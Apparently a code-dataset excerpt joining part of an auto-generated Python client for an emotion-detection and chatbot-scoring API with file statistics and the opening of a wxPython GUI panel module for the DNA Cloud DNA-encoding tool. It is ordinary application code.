"""
kwargs['_return_http_data_only'] = True
return self.detect_batch_emotion_with_http_info(batch_text, **kwargs) # noqa: E501
def detect_batch_emotion_with_http_info(self, batch_text, **kwargs): # noqa: E501
"""Detect the emotion of a list of strings # noqa: E501
Given a list of strings and the language of all strings, this method produces the emotion scores for each input string. Note: This method assumes that all of the strings are unrelated to each other, i.e. this method does not use context. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_batch_emotion_with_http_info(batch_text, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param BatchText batch_text: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(BatchEmotionResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['batch_text'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method detect_batch_emotion" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'batch_text' is set
if ('batch_text' not in local_var_params or
local_var_params['batch_text'] is None):
raise ApiValueError("Missing the required parameter `batch_text` when calling `detect_batch_emotion`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'batch_text' in local_var_params:
body_params = local_var_params['batch_text']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['sentim_auth'] # noqa: E501
return self.api_client.call_api(
'/emotion/batch', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BatchEmotionResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def detect_emotion(self, conversation, **kwargs): # noqa: E501
"""Detect emotion of a conversation # noqa: E501
Given a conversation and the language of that conversation, this method classifies the emotion expressed for the last message of the input conversation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_emotion(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: A conversation of length 1-5 turns. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: EmotionResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.detect_emotion_with_http_info(conversation, **kwargs) # noqa: E501
def detect_emotion_with_http_info(self, conversation, **kwargs): # noqa: E501
"""Detect emotion of a conversation # noqa: E501
Given a conversation and the language of that conversation, this method classifies the emotion expressed for the last message of the input conversation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_emotion_with_http_info(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: A conversation of length 1-5 turns. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(EmotionResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['conversation'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method detect_emotion" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'conversation' is set
if ('conversation' not in local_var_params or
local_var_params['conversation'] is None):
raise ApiValueError("Missing the required parameter `conversation` when calling `detect_emotion`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'conversation' in local_var_params:
body_params = local_var_params['conversation']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['sentim_auth'] # noqa: E501
return self.api_client.call_api(
'/emotion/single', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmotionResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def detect_emotion_conversation(self, conversation, **kwargs): # noqa: E501
"""Detect the emotion of every user message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, classify the emotion the user is expressing for every user message in the conversation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_emotion_conversation(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: BatchEmotionResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.detect_emotion_conversation_with_http_info(conversation, **kwargs) # noqa: E501
def detect_emotion_conversation_with_http_info(self, conversation, **kwargs): # noqa: E501
"""Detect the emotion of every user message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, classify the emotion the user is expressing for every user message in the conversation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_emotion_conversation_with_http_info(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(BatchEmotionResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['conversation'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method detect_emotion_conversation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'conversation' is set
if ('conversation' not in local_var_params or
local_var_params['conversation'] is None):
raise ApiValueError("Missing the required parameter `conversation` when calling `detect_emotion_conversation`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'conversation' in local_var_params:
body_params = local_var_params['conversation']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['sentim_auth'] # noqa: E501
return self.api_client.call_api(
'/emotion/conversation', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BatchEmotionResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_access_token(self, client_id, client_secret, **kwargs): # noqa: E501
"""Oauth 2.0 authentication handler # noqa: E501
Given your client id and secret (generated from the user settings page), generates the access token needed to authenticate with the rest of the api. Note: access tokens will eventually expire, so you will need to call this method periodically to get a new one. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_access_token(client_id, client_secret, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str client_id: Your client id (required)
:param str client_secret: Your client secret (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_access_token_with_http_info(client_id, client_secret, **kwargs) # noqa: E501
def get_access_token_with_http_info(self, client_id, client_secret, **kwargs): # noqa: E501
"""Oauth 2.0 authentication handler # noqa: E501
Given your client id and secret (generated from the user settings page), generates the access token needed to authenticate with the rest of the api. Note: access tokens will eventually expire, so you will need to call this method periodically to get a new one. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_access_token_with_http_info(client_id, client_secret, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str client_id: Your client id (required)
:param str client_secret: Your client secret (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(str, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['client_id', 'client_secret'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_access_token" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in local_var_params or
local_var_params['client_id'] is None):
raise ApiValueError("Missing the required parameter `client_id` when calling `get_access_token`") # noqa: E501
# verify the required parameter 'client_secret' is set
if ('client_secret' not in local_var_params or
local_var_params['client_secret'] is None):
raise ApiValueError("Missing the required parameter `client_secret` when calling `get_access_token`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'client_id' in local_var_params:
query_params.append(('client_id', local_var_params['client_id'])) # noqa: E501
if 'client_secret' in local_var_params:
query_params.append(('client_secret', local_var_params['client_secret'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/token', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def score_chatbot_conversation(self, conversation, **kwargs): # noqa: E501
"""Score the effectiveness of every chatbot message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, where the user is the first and last to talk, score every chatbot's message based on whether or not the user's emotion matches what we expect. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.score_chatbot_conversation(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ConversationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.score_chatbot_conversation_with_http_info(conversation, **kwargs) # noqa: E501
def score_chatbot_conversation_with_http_info(self, conversation, **kwargs): # noqa: E501
"""Score the effectiveness of every chatbot message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, where the user is the first and last to talk, score every chatbot's message based on whether or not the user's emotion matches what we expect. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.score_chatbot_conversation_with_http_info(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ConversationResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['conversation'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method score_chatbot_conversation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'conversation' is set
if ('conversation' not in local_var_params or
local_var_params['conversation'] is None):
raise ApiValueError("Missing the required parameter `conversation` when calling `score_chatbot_conversation`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'conversation' in local_var_params:
body_params = local_var_params['conversation']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['sentim_auth'] # noqa: E501
return self.api_client.call_api(
'/chatbot_effectiveness/batch', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ConversationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def score_chatbot_effect(self, conversation, **kwargs): # noqa: E501
"""Score the effectiveness of the last chatbot message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, score the chatbot's response (the second to last message) based on whether or not the user's emotion matches what we expect. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.score_chatbot_effect(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: float
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.score_chatbot_effect_with_http_info(conversation, **kwargs) # noqa: E501
def score_chatbot_effect_with_http_info(self, conversation, **kwargs): # noqa: E501
"""Score the effectiveness of the last chatbot message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, score the chatbot's response (the second to last message) based on whether or not the user's emotion matches what we expect. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.score_chatbot_effect_with_http_info(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(float, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['conversation'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method score_chatbot_effect" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'conversation' is set
if ('conversation' not in local_var_params or
local_var_params['conversation'] is None):
raise ApiValueError("Missing the required parameter `conversation` when calling `score_chatbot_effect`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'conversation' in local_var_params:
body_params = local_var_params['conversation']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['sentim_auth'] # noqa: E501
return self.api_client.call_api(
'/chatbot_effectiveness/single', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='float', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 47.958042 | 282 | 0.624205 | 3,922 | 34,290 | 5.23126 | 0.063233 | 0.035873 | 0.051859 | 0.02632 | 0.95321 | 0.945265 | 0.941073 | 0.937272 | 0.923283 | 0.910562 | 0 | 0.012812 | 0.305745 | 34,290 | 714 | 283 | 48.02521 | 0.84903 | 0.492826 | 0 | 0.762658 | 0 | 0 | 0.189961 | 0.040939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041139 | false | 0 | 0.015823 | 0 | 0.098101 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
09081e279869a354f068e0edd2a804d24f27ffb0 | 67,363 | py | Python | lib/dnacloud/source/panels.py | dphiffer/dna-codec | 235a3ee0fd5304e39a13656e8f8c524e63268e5a | [
"MIT"
] | 2 | 2017-02-21T02:38:59.000Z | 2018-05-27T23:48:55.000Z | lib/dnacloud/source/panels.py | dphiffer/dna-codec | 235a3ee0fd5304e39a13656e8f8c524e63268e5a | [
"MIT"
] | null | null | null | lib/dnacloud/source/panels.py | dphiffer/dna-codec | 235a3ee0fd5304e39a13656e8f8c524e63268e5a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
#########################################################################
Author: Shalin Shah
Project: DNA Cloud
Graduate Mentor: Dixita Limbachya
Mentor: Prof. Manish K Gupta
Date: 5 November 2013
Website: www.guptalab.org/dnacloud
This module contains both the panels for encoding and decoding.
#########################################################################
"""
import sys
from PIL import Image
if "win" in sys.platform:
from PIL import PngImagePlugin
import unicodedata
import barcodeGenerator
import math
import os
import sqlite3
import sqlite3 as lite
import wx
import extraModules
import multiprocessing
import time
from datetime import datetime
import shutil
import threading
CHUNK_SIZE = 1000000
if hasattr(sys, "frozen"):
PATH = os.path.dirname(sys.executable)
else:
PATH = os.path.dirname(os.path.abspath(__file__))
#print PATH , "panels"
FILE_EXT = '.dnac'
if "win" in sys.platform and not "darwin" in sys.platform:
BARCODE_HEIGHT = 96
BARCODE_WIDTH = 470
elif "linux" in sys.platform or 'darwin' in sys.platform:
BARCODE_HEIGHT = 96
BARCODE_WIDTH = 600
FOLDER_DISCLAIMER = "It is not mandatory for you to select default folder. If you don't then every time you save .dnac file you would be asked to save a location"
PREF_DISCLAIMER = "Disclaimer : Please note that this details will be used to identify user of the DNA strings by Bio Companies hence these are mandatory to be filled."
HEADER_TEXT = "Please select your workspace where you would work in. All your files(including temporary files) will be stored in this working directory, can be changed later also from preferences."
SOFTWARE_DETAILS = "\n\n Version 1.0\n\n Visit us at www.guptalab.org/dnacloud\n\n Contact us at dnacloud@guptalab.org"
class encodePanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent = parent,style = wx.TAB_TRAVERSAL)
self.vBox1 = wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self ,label = "DNA-ENCODER",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(pointSize = 19, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
else:
font = wx.Font(pointSize = 14, family = wx.DEFAULT,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
self.vBox1.Add(head ,flag = wx.ALIGN_CENTER | wx.TOP | wx.LEFT , border = 10)
#This is the adjustment of the Basic BUI text and textCtrl panels along with save to DataBase and Discard Button Options
head = wx.StaticText(self ,label = "Encode data file into DNA String",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line1 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose file",size = (150,30))
self.hBox1.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT , border = 10)
path = wx.StaticText(self, label = "Select any data file (audio, video, doc etc.) from your computer")
self.hBox1.Add(path,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT , border = 20)
self.vBox1.Add(self.hBox1)
head = wx.StaticText(self,label = "Details (approx.)")
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line2 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " File Selected : ",style = wx.ALIGN_CENTRE)
self.txt = wx.TextCtrl(self,name = "hBox",size = (500,25),style= wx.TE_READONLY)
self.hBox.Add(path,2 ,flag = wx.EXPAND)
self.hBox.Add(self.txt, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Lenght Of DNA String : " , style = wx.ALIGN_CENTRE)
self.txt2 = wx.TextCtrl(self,name = "hBox3",size = (300,25),style= wx.TE_READONLY)
self.hBox2.Add(content1, 2, flag = wx.EXPAND)
self.hBox2.Add(self.txt2, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox2,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Number of DNA Chunks : " , style = wx.ALIGN_CENTRE)
self.txt3 = wx.TextCtrl(self,name = "hBox3",size = (300,25),style= wx.TE_READONLY)
self.hBox3.Add(content1, 2, flag = wx.EXPAND)
self.hBox3.Add(self.txt3, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox3,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox4 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Length of each DNA Chunk : ", style = wx.ALIGN_CENTRE)
self.txt4 = wx.TextCtrl(self,name = "hBox4",size = (300,25),style= wx.TE_READONLY)
self.hBox4.Add(content1, 2, flag = wx.EXPAND)
self.hBox4.Add(self.txt4, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox4,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox5 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " File Size (Bytes) : " , style = wx.ALIGN_CENTRE)
self.txt5 = wx.TextCtrl(self,name = "hBox5",size = (300,25),style= wx.TE_READONLY)
self.hBox5.Add(content1, 2, flag = wx.EXPAND)
self.hBox5.Add(self.txt5, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox5,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
#There is nothing like self.txt1
"""
head = wx.StaticText(self,label = "Encoded DNA String")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox9 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = "DNA String : ", style = wx.ALIGN_CENTRE)
self.but9 = wx.Button(self,label = "View DNA String")
content1.SetFont(font)
self.hBox9.Add(content1 ,flag = wx.LEFT ,border = 20)
self.hBox9.Add(self.but9 ,flag = wx.EXPAND | wx.LEFT , border = 180)
self.vBox1.Add(self.hBox9 ,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox10 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = "DNA String List with Error Checks : ", style = wx.ALIGN_CENTRE)
self.but10 = wx.Button(self,label = "View DNA Chunks")
font = wx.Font(9 , wx.DEFAULT, wx.NORMAL, wx.BOLD)
content1.SetFont(font)
self.hBox10.Add(content1 ,flag = wx.LEFT ,border = 20)
self.hBox10.Add(self.but10 ,flag = wx.EXPAND)
self.vBox1.Add(self.hBox10 ,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
"""
self.hBox11 = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label = "Encode your File",size = (160,30))
self.discardBut = wx.Button(self,label = "Reset file Selected",size = (160,30))
self.hBox11.Add(self.saveBut, flag = wx.EXPAND | wx.LEFT , border = 20)
self.hBox11.Add(self.discardBut, flag = wx.EXPAND | wx.LEFT ,border = 20)
self.vBox1.Add(self.hBox11 ,flag = wx.TOP | wx.BOTTOM ,border = 10)
"""
self.clearDB = wx.Button(self,label = "Clear Database")
self.hBox11.Add(self.clearDB ,flag = wx.EXPAND)
head = wx.StaticText(self,label = "© QR Code generated for given User Details")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
img = wx.EmptyImage(240,240)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox1.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.BOTTOM , border = 25)
"""
self.dummyhBox = wx.BoxSizer(wx.VERTICAL)
self.vBox1.Add(self.dummyhBox, 2, wx.EXPAND)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND)
self.hBox12 = wx.BoxSizer(wx.HORIZONTAL)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.Image(name = PATH + '/../icons/DNAicon.png').ConvertToBitmap())
self.hBox12.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.TOP | wx.BOTTOM , border = 25)
self.v1Box= wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self,label = "DNA-CLOUD")
font = wx.Font(11, wx.DEFAULT, wx.NORMAL, wx.BOLD,underline = True)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.TOP | wx.LEFT,border = 25)
head = wx.StaticText(self,label = SOFTWARE_DETAILS)
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.LEFT | wx.EXPAND , border = 20)
